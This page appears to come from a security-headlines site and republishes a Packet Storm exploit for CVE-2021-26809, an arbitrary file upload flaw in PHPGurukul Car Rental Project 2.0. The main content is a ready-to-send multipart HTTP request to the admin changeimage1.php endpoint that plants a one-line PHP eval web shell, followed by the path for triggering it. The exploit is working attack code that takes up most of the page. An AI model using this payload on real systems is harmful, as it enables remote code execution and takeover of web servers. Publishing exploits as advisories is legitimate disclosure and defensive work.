Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-26809: Car Rental Project 2.0 Shell Upload ≈ Packet Storm

PHPGurukul Car Rental Project version 2.0 suffers from a remote shell upload vulnerability in changeimage1.php.

CVE
#sql#vulnerability#web#windows#php#rce#auth#firefox
# Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution# Date: 3/2/2021# Exploit Author: Jannick Tiger# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/# Version : V 2.0# Vulnerability Type: Arbitrary File Upload # Tested on Windows 10 、XAMPP# This application is vulnerable to Arbitrary File Upload to Remote Code Execution vulnerability.# Vulnerable script:POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------346751171915680139113101061568Content-Length: 369Origin: http://localhostConnection: closeReferer: http://localhost/carrental/admin/changeimage1.php?imgid=4Cookie: PHPSESSID=te82lj6tvep7afns0qm890393eUpgrade-Insecure-Requests: 1-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="img1"; filename="1.php"Content-Type: application/octet-stream<?php @eval($_POST[pp]);?>-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="update"-----------------------------346751171915680139113101061568--# Uploaded Malicious File can be Found in :carrental\admin\img\vehicleimages\1.php# go to http://localhost/carrental/admin/img/vehicleimages/1.php,Execute malicious code via post value phpinfo();

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907